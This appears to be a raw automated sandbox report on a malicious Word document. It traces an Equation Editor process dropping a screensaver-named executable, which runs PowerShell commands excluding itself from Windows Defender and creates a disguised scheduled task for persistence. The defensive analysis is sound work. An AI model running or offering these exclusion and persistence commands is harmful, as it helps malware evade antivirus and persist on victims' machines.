                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......S.........................s............h.......$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............h.......2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................T.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................T.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................4T.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................BT.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................^.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........._.........................s............x....... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................%_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................7_.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................C_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....U_.........................s............x.......$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................e_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x.......2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................._.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........_.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4........_.........................s............x...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........`.........................s............x...............................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ............................K........................................ .............................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P..............................K..............................................j.......x...............
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSystem information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: plugman23456.scr, plugman23456.scr, 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: plugman23456.scr, plugman23456.scr, 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: Offer ZI-0428.docReversingLabs: Detection: 47%
                  Source: Offer ZI-0428.docVirustotal: Detection: 40%
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_22-33246
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"
                  Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {8CF74EAD-4204-4C1F-8614-11C7F9468804} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr "C:\Users\user\AppData\Roaming\plugman23456.scr"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess created: C:\Users\user\AppData\Roaming\plugman23456.scr C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd"Jump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe C:\Users\user\AppData\Roaming\znlzneAxBVd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp"
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeProcess created: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: shcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: bcrypt.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
